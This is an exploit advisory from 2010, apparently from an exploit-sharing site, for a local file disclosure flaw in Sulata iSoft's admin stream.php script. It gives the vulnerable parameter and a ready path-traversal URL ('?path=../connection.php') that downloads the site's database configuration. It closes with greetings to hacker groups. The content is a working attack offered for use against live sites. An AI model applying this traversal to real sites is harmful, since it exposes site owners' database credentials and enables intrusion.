43 lines
No EOL
1.7 KiB
Text
43 lines
No EOL
1.7 KiB
Text
=========================================================
|
|
Sulata iSoft (stream.php) Local File Disclosure Exploit
|
|
=========================================================
|
|
|
|
# Exploit Title : Sulata iSoft (developer by Rizwan Azam) you look
|
|
site.com/about.php
|
|
# Date : 10 December 2010
|
|
# Author : Sudden_death
|
|
# Platform/Tested on: Windows XP 2 SP 2
|
|
# myweb : http://sudden.isgreat.org
|
|
# dork : your imagination
|
|
======================================================================
|
|
|
|
# vuln here
|
|
http://www.site.com/_admin/stream.php?path=
|
|
|
|
# try to download and watch source file stream.php
|
|
.....
|
|
//include_once("../home/library.php");
|
|
include_once("../connection.php"); <----------------------- look here,,
|
|
This is the config
|
|
suConnect();
|
|
.....
|
|
|
|
# after we know config, let us download
|
|
http://www.site.com/_admin/stream.php?path=../connection.php
|
|
|
|
|
|
[#]-------------------------------------------------------------------
|
|
|
|
Greets :| bumble_be | kiddies | patriot | Mr.SoOofe | petimati |
|
|
white hat | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0
|
|
d4rk fl00d3r | Ichito-Bandito | james0baster | kaMtiEz | Man In Black | otong |
|
|
r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic |
|
|
cah_surip | angga | demnas | ELV1N4 | jonathan | virgi | scr34mz | Kimmonosz |
|
|
pL4nkt0n | RxN7 | jos_ali_jo | 45tr0_k1ll1n9 | huda_style | zalezero |
|
|
CireSoft49 | r4tu_le64h | cruzen | ranggamagic | Mbah_semar | and all crew's
|
|
yang ga bisa ane sebutin satu persatu |
|
|
Spesial thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org |
|
|
makassarhacker.com ]
|
|
|
|
note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap
|
|
apa yang kau katakan! |